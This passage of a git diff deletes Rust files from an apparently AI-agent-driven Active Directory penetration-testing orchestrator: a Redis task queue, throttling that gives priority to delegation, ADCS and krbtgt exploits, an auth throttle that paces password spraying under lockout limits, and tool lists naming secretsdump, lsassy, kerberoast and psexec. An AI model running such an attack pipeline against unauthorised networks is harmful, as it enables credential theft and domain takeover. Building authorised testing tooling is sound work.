Result returned by a worker. Mirrors `ares.core.task_queue.TaskResult`. -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct TaskResult { - pub task_id: String, - pub success: bool, - #[serde(default)] - pub result: Option, - #[serde(default)] - pub error: Option, - pub completed_at: Option>, - #[serde(default)] - pub worker_pod: Option, - #[serde(default)] - pub agent_name: Option, -} - -/// Heartbeat payload written by agents. -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct HeartbeatData { - pub agent: String, - pub status: String, - pub timestamp: String, - #[serde(default)] - pub current_task: Option, - #[serde(default)] - pub pod_name: Option, -} - -// --------------------------------------------------------------------------- -// TaskQueue — thin async wrapper around a redis ConnectionManager. -// --------------------------------------------------------------------------- - -/// Async Redis task queue implementing the Ares queue protocol. -#[derive(Clone)] -pub struct TaskQueue { - conn: ConnectionManager, -} - -#[allow(dead_code)] -impl TaskQueue { - /// Create a new queue from an existing connection manager. - pub fn new(conn: ConnectionManager) -> Self { - Self { conn } - } - - /// Connect to Redis and return a TaskQueue. - pub async fn connect(redis_url: &str) -> Result { - let client = redis::Client::open(redis_url) - .with_context(|| format!("Invalid Redis URL: {redis_url}"))?; - // Default response_timeout is 500ms which is too short for BRPOP - // blocking calls (tool results can take minutes). Without this fix, - // the client-side timeout cancels the future but the server-side - // BRPOP remains registered, consuming results that are silently lost. - let config = redis::aio::ConnectionManagerConfig::new() - .set_response_timeout(Some(Duration::from_secs(1800))); - let conn = client - .get_connection_manager_with_config(config) - .await - .with_context(|| format!("Failed to connect to Redis at {redis_url}"))?; - info!(url = %redis_url, "Connected to Redis"); - Ok(Self { conn }) - } - - // === Key helpers ======================================================== - - #[inline] - fn task_queue_key(role: &str) -> String { - format!("{TASK_QUEUE_PREFIX}:{role}") - } - - #[inline] - fn result_queue_key(task_id: &str) -> String { - format!("{RESULT_QUEUE_PREFIX}:{task_id}") - } - - #[inline] - fn heartbeat_key(agent: &str) -> String { - format!("{HEARTBEAT_PREFIX}:{agent}") - } - - #[inline] - fn task_status_key(task_id: &str) -> String { - format!("{TASK_STATUS_PREFIX}:{task_id}") - } - - // === Orchestrator methods =============================================== - - /// Submit a task to a role's queue. - /// - /// Priority <= 2 (urgent) uses RPUSH so the task is consumed first by - /// workers that BRPOP from the right. All other priorities use LPUSH for - /// FIFO order. - pub async fn submit_task( - &self, - task_type: &str, - target_role: &str, - payload: serde_json::Value, - source_agent: &str, - priority: i32, - ) -> Result { - let task_id = format!("{}_{}", task_type, &Uuid::new_v4().to_string()[..12]); - let callback = Self::result_queue_key(&task_id); - - let msg = TaskMessage { - task_id: task_id.clone(), - task_type: task_type.to_string(), - source_agent: source_agent.to_string(), - target_agent: target_role.to_string(), - payload, - priority, - created_at: Some(Utc::now()), - callback_queue: Some(callback), - }; - - let queue_key = Self::task_queue_key(target_role); - let json = serde_json::to_string(&msg).context("Failed to serialize TaskMessage")?; - - let mut conn = self.conn.clone(); - if priority <= 2 { - conn.rpush::<_, _, ()>(&queue_key, &json) - .await - .with_context(|| format!("RPUSH to {queue_key}"))?; - info!(task_id = %task_id, queue = %queue_key, priority, "Urgent task submitted (RPUSH)"); - } else { - conn.lpush::<_, _, ()>(&queue_key, &json) - .await - .with_context(|| format!("LPUSH to {queue_key}"))?; - info!(task_id = %task_id, queue = %queue_key, priority, "Task submitted (LPUSH)"); - } - - // Track status - self.set_task_status(&task_id, "pending").await?; - - Ok(task_id) - } - - /// Non-destructive peek: does a result exist for this task? - pub async fn has_pending_result(&self, task_id: &str) -> Result { - let key = Self::result_queue_key(task_id); - let mut conn = self.conn.clone(); - let len: i64 = conn.llen(&key).await.unwrap_or(0); - Ok(len > 0) - } - - /// Non-blocking check for a task result (RPOP). - pub async fn check_result(&self, task_id: &str) -> Result> { - let key = Self::result_queue_key(task_id); - let mut conn = self.conn.clone(); - let data: Option = conn.rpop(&key, None).await?; - match data { - Some(json) => { - let result: TaskResult = serde_json::from_str(&json) - .with_context(|| format!("Bad TaskResult JSON for {task_id}"))?; - Ok(Some(result)) - } - None => Ok(None), - } - } - - /// Batch-check results for multiple task IDs using a pipeline. - pub async fn check_results_batch( - &self, - task_ids: &[String], - ) -> Result>> { - if task_ids.is_empty() { - return Ok(HashMap::new()); - } - - let mut pipe = redis::pipe(); - for tid in task_ids { - let key = Self::result_queue_key(tid); - pipe.cmd("RPOP").arg(key); - } - - let mut conn = self.conn.clone(); - let raw: Vec> = pipe - .query_async(&mut conn) - .await - .context("Pipeline check_results_batch failed")?; - - let mut out = HashMap::with_capacity(task_ids.len()); - for (tid, data) in task_ids.iter().zip(raw) { - let parsed = match data { - Some(json) => match serde_json::from_str::(&json) { - Ok(r) => Some(r), - Err(e) => { - warn!(task_id = %tid, err = %e, "Ignoring malformed TaskResult"); - None - } - }, - None => None, - }; - out.insert(tid.clone(), parsed); - } - Ok(out) - } - - /// Blocking wait for a result (BRPOP). Timeout in seconds. - pub async fn poll_result( - &self, - task_id: &str, - timeout_secs: f64, - ) -> Result> { - let key = Self::result_queue_key(task_id); - let mut conn = self.conn.clone(); - let result: Option<(String, String)> = conn - .brpop(&key, timeout_secs) - .await - .with_context(|| format!("BRPOP on {key}"))?; - - match result { - Some((_key, json)) => { - let tr: TaskResult = serde_json::from_str(&json) - .with_context(|| format!("Bad TaskResult JSON for {task_id}"))?; - Ok(Some(tr)) - } - None => Ok(None), - } - } - - /// Get the length of a role's task queue. - pub async fn queue_length(&self, role: &str) -> Result { - let key = Self::task_queue_key(role); - let mut conn = self.conn.clone(); - let len: usize = conn.llen(&key).await?; - Ok(len) - } - - /// Read heartbeat data for an agent. - pub async fn get_heartbeat(&self, agent: &str) -> Result> { - let key = Self::heartbeat_key(agent); - let mut conn = self.conn.clone(); - let data: Option = conn.get(&key).await?; - match data { - Some(json) => { - let hb: HeartbeatData = serde_json::from_str(&json)?; - Ok(Some(hb)) - } - None => Ok(None), - } - } - - /// Write heartbeat for an agent (with TTL so stale entries self-expire). - pub async fn send_heartbeat( - &self, - agent: &str, - status: &str, - current_task: Option<&str>, - ttl: Duration, - ) -> Result<()> { - let key = Self::heartbeat_key(agent); - let hb = HeartbeatData { - agent: agent.to_string(), - status: status.to_string(), - timestamp: Utc::now().to_rfc3339(), - current_task: current_task.map(|s| s.to_string()), - pod_name: std::env::var("POD_NAME").ok(), - }; - let json = serde_json::to_string(&hb)?; - let mut conn = self.conn.clone(); - conn.set_ex::<_, _, ()>(&key, &json, ttl.as_secs()) - .await - .with_context(|| format!("SET EX heartbeat for {agent}"))?; - debug!(agent, status, "Heartbeat sent"); - Ok(()) - } - - /// Publish a state-update notification on the PubSub channel. - pub async fn publish_state_update(&self, operation_id: &str) -> Result<()> { - let channel = format!("{STATE_UPDATE_CHANNEL_PREFIX}:{operation_id}"); - let mut conn = self.conn.clone(); - conn.publish::<_, _, ()>(&channel, "updated") - .await - .with_context(|| format!("PUBLISH to {channel}"))?; - debug!(operation_id, "State update published"); - Ok(()) - } - - // === Operation lock ===================================================== - - /// Try to acquire the operation lock. Returns true if acquired. - pub async fn try_acquire_lock(&self, operation_id: &str, ttl: Duration) -> Result { - let key = format!("{LOCK_PREFIX}:{operation_id}"); - let holder = format!( - "orchestrator-{}", - std::env::var("POD_NAME").unwrap_or_else(|_| Uuid::new_v4().to_string()) - ); - let mut conn = self.conn.clone(); - let acquired: bool = redis::cmd("SET") - .arg(&key) - .arg(&holder) - .arg("NX") - .arg("EX") - .arg(ttl.as_secs()) - .query_async(&mut conn) - .await - .with_context(|| format!("SET NX lock for operation {operation_id}"))?; - if acquired { - info!(operation_id, "Operation lock acquired"); - } - Ok(acquired) - } - - /// Extend the operation lock TTL. Call periodically to keep it alive. - pub async fn extend_lock(&self, operation_id: &str, ttl: Duration) -> Result { - let key = format!("{LOCK_PREFIX}:{operation_id}"); - let mut conn = self.conn.clone(); - let ok: bool = conn.expire(&key, ttl.as_secs() as i64).await?; - if !ok { - warn!(operation_id, "Lock key missing — could not extend TTL"); - } - Ok(ok) - } - - // === Task status tracking =============================================== - - /// Set the status string for a task (with 24h TTL). - /// - /// If a record already exists for this task, preserves existing fields - /// (operation_id, role, task_type, started_at, payload) and updates - /// only the status and timestamps. - pub async fn set_task_status(&self, task_id: &str, status: &str) -> Result<()> { - let key = Self::task_status_key(task_id); - let mut conn = self.conn.clone(); - - // Read-modify-write: preserve existing fields - let existing: Option = match conn.get::<_, Option>(&key).await { - Ok(v) => v, - Err(e) => { - warn!(task_id = task_id, err = %e, "Failed to read existing task status"); - None - } - }; - let mut payload: serde_json::Value = existing - .and_then(|s| serde_json::from_str(&s).ok()) - .unwrap_or_else(|| serde_json::json!({})); - - let now = Utc::now().to_rfc3339(); - payload["task_id"] = serde_json::json!(task_id); - payload["status"] = serde_json::json!(status); - payload["updated_at"] = serde_json::json!(now); - - if status == "in_progress" && payload.get("started_at").is_none() { - payload["started_at"] = serde_json::json!(now); - } - if status == "completed" || status == "failed" { - payload["ended_at"] = serde_json::json!(now); - } - - let json = payload.to_string(); - conn.set_ex::<_, _, ()>(&key, &json, TASK_STATUS_TTL_SECS) - .await?; - Ok(()) - } - - /// Write a full task status record with all metadata. - pub async fn set_task_status_full( - &self, - task_id: &str, - status: &str, - operation_id: &str, - role: &str, - task_type: &str, - payload: Option<&serde_json::Value>, - ) -> Result<()> { - let key = Self::task_status_key(task_id); - let now = Utc::now().to_rfc3339(); - let mut record = serde_json::json!({ - "task_id": task_id, - "status": status, - "operation_id": operation_id, - "role": role, - "task_type": task_type, - "updated_at": now, - }); - if status == "in_progress" { - record["started_at"] = serde_json::json!(now); - } - if let Some(p) = payload { - record["payload"] = p.clone(); - } - let json = record.to_string(); - let mut conn = self.conn.clone(); - conn.set_ex::<_, _, ()>(&key, &json, TASK_STATUS_TTL_SECS) - .await?; - Ok(()) - } - - /// Read task status. - pub async fn get_task_status(&self, task_id: &str) -> Result> { - let key = Self::task_status_key(task_id); - let mut conn = self.conn.clone(); - let data: Option = conn.get(&key).await?; - Ok(data) - } - - /// Get a clone of the underlying connection manager. - /// - /// Used by the deferred queue to run ZSET commands directly. - pub fn connection(&self) -> ConnectionManager { - self.conn.clone() - } - - /// Send a result to the task's result queue (worker side). - pub async fn send_result(&self, task_id: &str, result: &TaskResult) -> Result<()> { - let key = Self::result_queue_key(task_id); - let json = serde_json::to_string(result)?; - let mut conn = self.conn.clone(); - conn.lpush::<_, _, ()>(&key, &json).await?; - conn.expire::<_, ()>(&key, RESULT_TTL_SECS as i64).await?; - let final_status = if result.success { - "completed" - } else { - "failed" - }; - debug!( - task_id = task_id, - status = final_status, - "Updating task status after send_result" - ); - self.set_task_status(task_id, final_status).await?; - debug!(task_id = task_id, "Task status updated to {}", final_status); - Ok(()) - } -} diff --git a/ares-orchestrator/src/throttling.rs b/ares-orchestrator/src/throttling.rs deleted file mode 100644 index 2471c413..00000000 --- a/ares-orchestrator/src/throttling.rs +++ /dev/null @@ -1,440 +0,0 @@ -//! Rate limiting and concurrency control. -//! -//! Mirrors the Python `ares.core.dispatcher.throttling.ThrottlingMixin`. -//! -//! Three layers of throttling: -//! 1. **Per-role semaphores** — limits how many tasks one role can have in-flight. -//! 2. **Global LLM concurrency** — soft cap + 1.5x hard cap before deferring. -//! 3. **Dispatch delay** — minimum interval between consecutive submissions. - -use std::collections::HashMap; -use std::sync::Arc; -use std::time::Instant; - -use tokio::sync::Semaphore; -use tracing::{debug, info, warn}; - -use crate::config::OrchestratorConfig; -use crate::routing::ActiveTaskTracker; - -// --------------------------------------------------------------------------- -// Critical-path classification (matches Python ThrottlingMixin constants) -// --------------------------------------------------------------------------- - -/// Task types that bypass hard-cap throttling (DA-critical path). -const CRITICAL_PATH_TASK_TYPES: &[&str] = &["exploit"]; - -/// High-value exploit subtypes that bypass hard cap. -const CRITICAL_PATH_VULN_TYPES: &[&str] = &[ - "constrained_delegation", - "unconstrained_delegation", - "esc1", - "esc4", - "esc8", - "krbtgt_hash", - "adcs_esc1", - "adcs_esc4", - "adcs_esc8", -]; - -/// Maximum tasks allowed to bypass the hard cap simultaneously. -const MAX_BYPASS_TASKS: usize = 3; - -// --------------------------------------------------------------------------- -// ThrottleDecision -// --------------------------------------------------------------------------- - -/// What the throttler decided about a candidate task. -#[derive(Debug, Clone, PartialEq, Eq)] -pub enum ThrottleDecision { - /// Submit immediately. - Allow, - /// Defer to the deferred queue. - Defer, - /// Wait for `duration` then re-check. - Wait(std::time::Duration), -} - -// --------------------------------------------------------------------------- -// Throttler -// --------------------------------------------------------------------------- - -/// Concurrency controller that mirrors the Python throttling logic. -#[allow(dead_code)] -pub struct Throttler { - config: Arc, - tracker: ActiveTaskTracker, - /// Per-role semaphores (lazily populated). - role_semaphores: tokio::sync::Mutex>>, - /// Timestamp of the last successful dispatch. - last_dispatch: tokio::sync::Mutex, - /// Accumulated rate-limit errors (from worker feedback). - rate_limit_errors: tokio::sync::Mutex, - /// Global backoff deadline (if any). - backoff_until: tokio::sync::Mutex>, -} - -impl Throttler { - pub fn new(config: Arc, tracker: ActiveTaskTracker) -> Self { - Self { - config, - tracker, - role_semaphores: tokio::sync::Mutex::new(HashMap::new()), - last_dispatch: tokio::sync::Mutex::new(Instant::now()), - rate_limit_errors: tokio::sync::Mutex::new(0), - backoff_until: tokio::sync::Mutex::new(None), - } - } - - /// Evaluate whether `task_type` targeting `role` should be allowed now. - pub async fn check( - &self, - task_type: &str, - target_role: &str, - payload: Option<&serde_json::Value>, - ) -> ThrottleDecision { - // Non-LLM tasks (crack, command) always pass. - if crate::routing::is_non_llm_task(task_type) { - return ThrottleDecision::Allow; - } - - { - let backoff = self.backoff_until.lock().await; - if let Some(deadline) = *backoff { - if Instant::now() < deadline { - let remaining = deadline - Instant::now(); - return ThrottleDecision::Wait(remaining); - } - } - } - - let llm_count = self.tracker.llm_task_count().await; - let max_tasks = self.config.max_concurrent_tasks; - let hard_cap = self.config.hard_cap(); - - // --- HARD CAP (1.5x) --- - if llm_count >= hard_cap { - if self.is_critical_path(task_type, payload) { - let bypass_count = llm_count.saturating_sub(hard_cap); - if bypass_count >= MAX_BYPASS_TASKS { - warn!( - llm_count, - hard_cap, - bypass_count, - task_type, - "Hard cap: too many bypass tasks, deferring" - ); - return ThrottleDecision::Defer; - } - info!( - llm_count, - hard_cap, - bypass = bypass_count + 1, - task_type, - "Hard cap: allowing critical-path task" - ); - return ThrottleDecision::Allow; - } - - debug!(llm_count, hard_cap, task_type, "Hard cap: deferring task"); - return ThrottleDecision::Defer; - } - - // --- SOFT CAP --- - if llm_count >= max_tasks { - let role_count = self.tracker.count_for_role(target_role).await; - let min_per_role = 1_usize; // matches get_min_slots_per_role default - if role_count < min_per_role { - info!( - llm_count, - max_tasks, - role = target_role, - role_count, - "Soft cap: allowing — role below minimum" - ); - return ThrottleDecision::Allow; - } - debug!(llm_count, max_tasks, task_type, "Soft cap: deferring task"); - return ThrottleDecision::Defer; - } - - // --- Dispatch delay --- - { - let last = self.last_dispatch.lock().await; - let elapsed = last.elapsed(); - if elapsed < self.config.dispatch_delay { - let wait = self.config.dispatch_delay - elapsed; - return ThrottleDecision::Wait(wait); - } - } - - ThrottleDecision::Allow - } - - /// Record that a dispatch happened (updates the last-dispatch timestamp). - pub async fn record_dispatch(&self) { - let mut last = self.last_dispatch.lock().await; - *last = Instant::now(); - } - - /// Record a rate-limit error from a worker. If enough accumulate, trigger - /// a global backoff. - pub async fn record_rate_limit_error(&self) { - let mut errors = self.rate_limit_errors.lock().await; - *errors += 1; - let threshold = 3_u32; // matches Python get_rate_limit_threshold default - if *errors >= threshold { - let backoff_secs = 30_u64; // matches Python get_rate_limit_backoff default - let mut bo = self.backoff_until.lock().await; - *bo = Some(Instant::now() + std::time::Duration::from_secs(backoff_secs)); - warn!( - errors = *errors, - backoff_secs, "Rate limit threshold reached — applying global backoff" - ); - *errors = 0; - } - } - - /// Clear one rate-limit error (call on successful task completion). - pub async fn clear_rate_limit_error(&self) { - let mut errors = self.rate_limit_errors.lock().await; - *errors = errors.saturating_sub(1); - } - - /// Acquire a per-role semaphore permit. Returns a guard that releases on drop. - #[allow(dead_code)] - pub async fn acquire_role_permit( - &self, - role: &str, - ) -> Option { - let sem = { - let mut sems = self.role_semaphores.lock().await; - sems.entry(role.to_string()) - .or_insert_with(|| Arc::new(Semaphore::new(self.config.max_tasks_per_role))) - .clone() - }; - sem.try_acquire_owned().ok() - } - - // --- internal --- - - fn is_critical_path(&self, task_type: &str, payload: Option<&serde_json::Value>) -> bool { - // Check exploit + vuln_type - if CRITICAL_PATH_TASK_TYPES.contains(&task_type) { - if let Some(p) = payload { - let vt = p - .get("vuln_type") - .and_then(|v| v.as_str()) - .unwrap_or("") - .to_lowercase(); - if CRITICAL_PATH_VULN_TYPES.contains(&vt.as_str()) { - return true; - } - } - } - - // Check delegation enumeration - if task_type == "privesc_enumeration" { - if let Some(techniques) = payload - .and_then(|p| p.get("techniques")) - .and_then(|v| v.as_array()) - { - if techniques.iter().any(|t| { - t.as_str() - .map(|s| s.to_lowercase().contains("delegation")) - .unwrap_or(false) - }) { - return true; - } - } - } - - // Check ESC8 coercion - if task_type == "coercion" { - if let Some(techniques) = payload - .and_then(|p| p.get("techniques")) - .and_then(|v| v.as_array()) - { - let esc8_techniques = ["ntlmrelayx_to_adcs", "petitpotam"]; - if techniques.iter().any(|t| { - t.as_str() - .map(|s| esc8_techniques.contains(&s.to_lowercase().as_str())) - .unwrap_or(false) - }) { - return true; - } - } - } - - false - } -} - -#[cfg(test)] -mod tests { - use super::*; - use crate::routing::{ActiveTask, ActiveTaskTracker}; - use serde_json::json; - - fn make_throttler(max_tasks: usize) -> (Throttler, ActiveTaskTracker) { - let config = Arc::new(crate::config::OrchestratorConfig { - redis_url: "redis://localhost".into(), - operation_id: "test-op".into(), - max_concurrent_tasks: max_tasks, - heartbeat_interval: std::time::Duration::from_secs(30), - heartbeat_timeout: std::time::Duration::from_secs(120), - result_poll_interval: std::time::Duration::from_millis(500), - lock_ttl: std::time::Duration::from_secs(300), - deferred_poll_interval: std::time::Duration::from_secs(10), - max_tasks_per_role: 3, - dispatch_delay: std::time::Duration::from_millis(0), - stale_task_timeout: std::time::Duration::from_secs(300), - deferred_task_max_age: std::time::Duration::from_secs(300), - max_deferred_per_type: 5, - max_deferred_total: 20, - target_domain: String::new(), - target_ips: Vec::new(), - initial_credential: None, - }); - let tracker = ActiveTaskTracker::new(); - (Throttler::new(config, tracker.clone()), tracker) - } - - #[tokio::test] - async fn non_llm_always_allowed() { - let (t, _) = make_throttler(1); - assert_eq!( - t.check("crack", "cracker", None).await, - ThrottleDecision::Allow - ); - assert_eq!( - t.check("command", "lateral", None).await, - ThrottleDecision::Allow - ); - } - - #[tokio::test] - async fn under_soft_cap_allows() { - let (t, _) = make_throttler(8); - assert_eq!( - t.check("recon", "recon", None).await, - ThrottleDecision::Allow - ); - } - - #[tokio::test] - async fn hard_cap_defers_non_critical() { - let (t, tracker) = make_throttler(2); // soft=2, hard=3 - for i in 0..3 { - tracker - .add(ActiveTask { - task_id: format!("t{i}"), - task_type: "recon".into(), - role: "recon".into(), - submitted_at: Instant::now(), - }) - .await; - } - assert_eq!( - t.check("recon", "recon", None).await, - ThrottleDecision::Defer - ); - } - - #[tokio::test] - async fn critical_path_bypasses_hard_cap() { - let (t, tracker) = make_throttler(2); - for i in 0..3 { - tracker - .add(ActiveTask { - task_id: format!("t{i}"), - task_type: "recon".into(), - role: "recon".into(), - submitted_at: Instant::now(), - }) - .await; - } - let payload = json!({"vuln_type": "constrained_delegation"}); - assert_eq!( - t.check("exploit", "privesc", Some(&payload)).await, - ThrottleDecision::Allow - ); - } - - #[tokio::test] - async fn critical_path_delegation_enum() { - let (t, tracker) = make_throttler(2); - for i in 0..3 { - tracker - .add(ActiveTask { - task_id: format!("t{i}"), - task_type: "recon".into(), - role: "recon".into(), - submitted_at: Instant::now(), - }) - .await; - } - let payload = json!({"techniques": ["find_delegation"]}); - assert_eq!( - t.check("privesc_enumeration", "privesc", Some(&payload)) - .await, - ThrottleDecision::Allow - ); - } - - #[tokio::test] - async fn critical_path_esc8_coercion() { - let (t, tracker) = make_throttler(2); - for i in 0..3 { - tracker - .add(ActiveTask { - task_id: format!("t{i}"), - task_type: "recon".into(), - role: "recon".into(), - submitted_at: Instant::now(), - }) - .await; - } - let payload = json!({"techniques": ["petitpotam"]}); - assert_eq!( - t.check("coercion", "coercion", Some(&payload)).await, - ThrottleDecision::Allow - ); - } - - #[tokio::test] - async fn rate_limit_triggers_backoff() { - let (t, _) = make_throttler(8); - t.record_rate_limit_error().await; - t.record_rate_limit_error().await; - t.record_rate_limit_error().await; // threshold=3 - assert!(matches!( - t.check("recon", "recon", None).await, - ThrottleDecision::Wait(_) - )); - } - - #[tokio::test] - async fn clear_error_prevents_backoff() { - let (t, _) = make_throttler(8); - t.record_rate_limit_error().await; - t.record_rate_limit_error().await; - t.clear_rate_limit_error().await; // back to 1 - t.record_rate_limit_error().await; // now 2 - assert_eq!( - t.check("recon", "recon", None).await, - ThrottleDecision::Allow - ); - } - - #[tokio::test] - async fn role_semaphore_limits() { - let (t, _) = make_throttler(8); - let _p1 = t.acquire_role_permit("recon").await; - let _p2 = t.acquire_role_permit("recon").await; - let _p3 = t.acquire_role_permit("recon").await; - assert!(_p1.is_some() && _p2.is_some() && _p3.is_some()); - assert!(t.acquire_role_permit("recon").await.is_none()); - assert!(t.acquire_role_permit("lateral").await.is_some()); - } -} diff --git a/ares-orchestrator/src/tool_dispatcher/auth_throttle.rs b/ares-orchestrator/src/tool_dispatcher/auth_throttle.rs deleted file mode 100644 index c6ae3023..00000000 --- a/ares-orchestrator/src/tool_dispatcher/auth_throttle.rs +++ /dev/null @@ -1,88 +0,0 @@ -//! Per-credential auth throttle to prevent AD account lockout. - -use std::sync::Arc; -use std::time::{Duration, Instant}; - -use tokio::sync::Mutex; -use tracing::debug; - -/// Per-credential auth attempt tracker. -/// -/// Tracks timestamps of auth-bearing tool dispatches keyed by `user@domain`. -/// Before dispatching, callers must call `acquire()` which sleeps if the -/// credential has been used too many times within the observation window. -/// -/// Default policy: max 3 auth attempts per credential per 60-second window. -/// This stays well under the typical AD lockout threshold (5 in 5 min). -#[derive(Clone)] -pub struct AuthThrottle { - pub(super) inner: Arc>, -} - -pub(super) struct AuthThrottleInner { - /// `credential_key` → Vec of timestamps - pub(super) attempts: std::collections::HashMap>, - /// Max auth attempts per credential within the observation window. - pub(super) max_attempts: usize, - /// Observation window for rate limiting. - pub(super) window: Duration, -} - -impl AuthThrottle { - pub fn new(max_attempts: usize, window: Duration) -> Self { - Self { - inner: Arc::new(Mutex::new(AuthThrottleInner { - attempts: std::collections::HashMap::new(), - max_attempts, - window, - })), - } - } - - /// Acquire permission to dispatch an auth-bearing tool call. - /// Sleeps if the credential has hit the rate limit within the window. - pub async fn acquire(&self, credential_key: &str) { - loop { - let sleep_dur = { - let mut inner = self.inner.lock().await; - let now = Instant::now(); - let max_attempts = inner.max_attempts; - let window = inner.window; - - let timestamps = inner - .attempts - .entry(credential_key.to_string()) - .or_default(); - - // Prune expired entries - timestamps.retain(|t| now.duration_since(*t) < window); - - if timestamps.len() < max_attempts { - // Under the limit — record this attempt and proceed - timestamps.push(now); - return; - } - - // Over the limit — calculate how long to wait until the oldest - // attempt falls outside the window - let oldest = timestamps[0]; - let elapsed = now.duration_since(oldest); - if elapsed >= window { - // Edge case: already expired, prune and retry - timestamps.remove(0); - timestamps.push(now); - return; - } - - window - elapsed + Duration::from_millis(100) - }; - - debug!( - credential = credential_key, - wait_secs = sleep_dur.as_secs_f32(), - "Auth throttle: delaying tool dispatch to avoid account lockout" - ); - tokio::time::sleep(sleep_dur).await; - } - } -} diff --git a/ares-orchestrator/src/tool_dispatcher/local.rs b/ares-orchestrator/src/tool_dispatcher/local.rs deleted file mode 100644 index 496e1aa7..00000000 --- a/ares-orchestrator/src/tool_dispatcher/local.rs +++ /dev/null @@ -1,91 +0,0 @@ -//! In-process tool dispatcher (no Redis). - -use anyhow::Result; -use tracing::debug; - -use ares_llm::{ToolCall, ToolExecResult}; - -use crate::task_queue::TaskQueue; - -use super::{extract_credential_key, push_realtime_discoveries, AuthThrottle}; - -/// Dispatches tool calls directly via `ares_tools::dispatch` without Redis. -/// -/// Useful for testing, single-binary deployments, or when workers are -/// colocated in the same process as the orchestrator. -pub struct LocalToolDispatcher { - pub(super) queue: TaskQueue, - pub(super) operation_id: String, - pub(super) auth_throttle: AuthThrottle, -} - -impl LocalToolDispatcher { - pub fn new(queue: TaskQueue, operation_id: String, auth_throttle: AuthThrottle) -> Self { - Self { - queue, - operation_id, - auth_throttle, - } - } -} - -#[async_trait::async_trait] -impl ares_llm::ToolDispatcher for LocalToolDispatcher { - async fn dispatch_tool( - &self, - _role: &str, - _task_id: &str, - call: &ToolCall, - ) -> Result { - // Rate-limit auth-bearing tools to prevent AD account lockout - if let Some(cred_key) = extract_credential_key(call) { - self.auth_throttle.acquire(&cred_key).await; - } - - debug!(tool = %call.name, "Executing tool locally"); - - match ares_tools::dispatch(&call.name, &call.arguments).await { - Ok(output) => { - let raw = output.combined_raw(); - let combined = output.combined(); - let error = if output.success { - None - } else { - Some(format!("tool exited with code {:?}", output.exit_code)) - }; - - // Parse structured discoveries from raw (unfiltered) output - let discoveries = - ares_tools::parsers::parse_tool_output(&call.name, &raw, &call.arguments); - let discoveries = if discoveries.as_object().is_none_or(|o| o.is_empty()) { - None - } else { - Some(discoveries) - }; - - // Push discoveries to real-time list immediately (like RedisToolDispatcher) - if let Some(ref disc) = discoveries { - push_realtime_discoveries( - &self.queue, - &self.operation_id, - disc, - &call.name, - &call.arguments, - ) - .await; - } - - Ok(ToolExecResult { - output: combined, - error, - discoveries, - }) - } - Err(e) => Ok(ToolExecResult { - output: String::new(), - error: Some(e.to_string()), - discoveries: None, - }), - } - } -} diff --git a/ares-orchestrator/src/tool_dispatcher/mod.rs b/ares-orchestrator/src/tool_dispatcher/mod.rs deleted file mode 100644 index ad8d4327..00000000 --- a/ares-orchestrator/src/tool_dispatcher/mod.rs +++ /dev/null @@ -1,228 +0,0 @@ -//! Redis-backed tool dispatcher for the LLM agent loop. -//! -//! Implements `ares_llm::ToolDispatcher` by pushing individual tool calls -//! to a Redis queue (`ares:tool_exec:{role}`) and waiting for results -//! on a per-call mailbox (`ares:tool_results:{call_id}`). -//! -//! Rust workers run a tool executor that BRPOPs from `tool_exec`, -//! invokes the tool via `ares_tools::dispatch`, and LPUSHes the result. -//! -//! Also provides [`LocalToolDispatcher`] for in-process execution without -//! going through Redis, useful for testing or single-binary deployments. - -use redis::AsyncCommands; -use serde::{Deserialize, Serialize}; -use tracing::debug; - -use crate::state::DISCOVERY_KEY_PREFIX; -use crate::task_queue::TaskQueue; - -mod auth_throttle; -mod local; -mod redis_dispatcher; -#[cfg(test)] -mod tests; - -pub use auth_throttle::AuthThrottle; -pub use local::LocalToolDispatcher; -pub use redis_dispatcher::RedisToolDispatcher; - -// --------------------------------------------------------------------------- -// Wire format -// --------------------------------------------------------------------------- - -/// Message pushed to the tool execution queue. -#[derive(Debug, Serialize, Deserialize)] -pub struct ToolExecRequest { - pub call_id: String, - pub task_id: String, - pub tool_name: String, - pub arguments: serde_json::Value, - /// W3C traceparent header for cross-service span linking. - #[serde(skip_serializing_if = "Option::is_none", default)] - pub traceparent: Option, - /// Operation ID for span correlation with dashboards. - #[serde(skip_serializing_if = "Option::is_none", default)] - pub operation_id: Option, -} - -/// Message returned by the worker on the result mailbox. -#[derive(Debug, Serialize, Deserialize)] -pub struct ToolExecResponse { - pub call_id: String, - pub output: String, - pub error: Option, - /// Structured discoveries parsed by the worker from tool output. - #[serde(default)] - pub discoveries: Option, -} - -// --------------------------------------------------------------------------- -// Constants -// --------------------------------------------------------------------------- - -/// Prefix for tool execution request queues. -pub(super) const TOOL_EXEC_PREFIX: &str = "ares:tool_exec"; - -/// Prefix for per-call result mailboxes. -pub(super) const TOOL_RESULT_PREFIX: &str = "ares:tool_results"; - -/// TTL for result keys (1 hour). -pub(super) const RESULT_TTL_SECS: u64 = 3600; - -/// Default timeout waiting for a tool result (25 minutes). -/// Must exceed queue wait time + longest tool runtime (hashcat can queue -/// behind another hashcat, so 2x runtime + buffer). -pub(super) const DEFAULT_TOOL_TIMEOUT_SECS: u64 = 1500; - -// --------------------------------------------------------------------------- -// Dispatcher helpers -// --------------------------------------------------------------------------- - -/// Tools that require netexec/ldapsearch and must be routed to the recon -/// worker queue regardless of the calling agent's role. -const RECON_ROUTED_TOOLS: &[&str] = &[ - "ldap_search_descriptions", - "password_spray", - "username_as_password", - "gpp_password_finder", - "sysvol_script_search", - "password_policy", - "laps_dump", - "smbclient_spider", - "check_credman_entries", - "check_autologon_registry", - "domain_admin_checker", - "gmsa_dump_passwords", -]; - -/// Tools that authenticate against AD targets. Tool calls with these names -/// are subject to per-credential rate limiting to avoid account lockout. -const AUTH_BEARING_TOOLS: &[&str] = &[ - // netexec tools (each invocation is a separate SMB/LDAP auth) - "ldap_search_descriptions", - "password_spray", - "username_as_password", - "gpp_password_finder", - "sysvol_script_search", - "password_policy", - "laps_dump", - "smbclient_spider", - "check_credman_entries", - "check_autologon_registry", - "domain_admin_checker", - "gmsa_dump_passwords", - // impacket tools - "secretsdump", - "secretsdump_kerberos", - "kerberoast", - "asrep_roast", - "lsassy", - "ntds_dit_extract", - // lateral tools (auth per target) - "smbexec", - "psexec", - "wmiexec", - "dcomexec", - "atexec", - "smbclient_kerberos_shares", -]; - -/// Extract a credential key from tool call arguments for rate limiting. -/// Returns `Some("user@domain")` if the tool authenticates with credentials. -pub(super) fn extract_credential_key(call: &ares_llm::ToolCall) -> Option { - if 